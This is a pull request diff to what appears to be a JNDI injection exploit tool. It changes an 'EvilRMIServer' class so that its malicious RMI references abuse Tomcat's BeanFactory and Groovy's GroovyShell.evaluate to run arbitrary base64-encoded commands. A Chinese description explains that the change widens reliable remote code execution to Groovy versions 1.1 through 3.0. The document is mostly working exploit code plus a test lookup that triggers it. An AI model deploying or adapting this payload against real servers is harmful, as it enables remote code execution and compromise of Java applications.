### PR TITLE
Enhance payload to support Groovy < 2.0

### DIFF
--- a/src/main/java/payloads/EvilRMIServer.java
+++ b/src/main/java/payloads/EvilRMIServer.java
@@ -34,13 +34,10 @@ public class EvilRMIServer {
     /*
      * Need : Tomcat and groovy in classpath.
      */
-    public ReferenceWrapper execByGroovyParse() throws RemoteException, NamingException{
-        ResourceRef ref = new ResourceRef("groovy.lang.GroovyClassLoader", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
-        ref.add(new StringRefAddr("forceString", "x=parseClass"));
-        String script = String.format("@groovy.transform.ASTTest(value={\n" +
-                "    assert java.lang.Runtime.getRuntime().exec(\"%s\")\n" +
-                "})\n" +
-                "def x\n", commandGenerator.getBase64CommandTpl());
+    public ReferenceWrapper execByGroovy() throws RemoteException, NamingException{
+        ResourceRef ref = new ResourceRef("groovy.lang.GroovyShell", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
+        ref.add(new StringRefAddr("forceString", "x=evaluate"));
+        String script = String.format("'%s'.execute()", commandGenerator.getBase64CommandTpl());
         ref.add(new StringRefAddr("x",script));
         return new ReferenceWrapper(ref);
     }
@@ -61,6 +58,6 @@ public class EvilRMIServer {
         System.setProperty("java.rmi.server.hostname",ip);
 
         registry.bind("ExecByEL",evilRMIServer.execByEL());
-        registry.bind("ExecByGroovyParse",evilRMIServer.execByGroovyParse());
+        registry.bind("ExecByGroovy",evilRMIServer.execByGroovy());
     }
 }

--- a/src/test/java/Target.java
+++ b/src/test/java/Target.java
@@ -15,9 +15,9 @@ public class Target {
     }
 
     @Test
-    public void lookupBypassByGroovyParse()throws NamingException{
+    public void lookupBypassByGroovy()throws NamingException{
         InitialContext ctx = new InitialContext();
-        ctx.lookup("rmi://127.0.0.1:1097/ExecByGroovyParse");
+        ctx.lookup("rmi://127.0.0.1:1097/ExecByGroovy");
     }
 
 


### PR DESCRIPTION
Groovy > 2.0 起才支援編譯中執行(Meta Programming in parseClass), 因此在 Groovy < 2.0 的環境中無法穩定 RCE

使用 `groovy.lang.GroovyShell` 可以更穩定的執行代碼, 經測試從 Groovy 1.1. 到 3.0 全版本皆支援!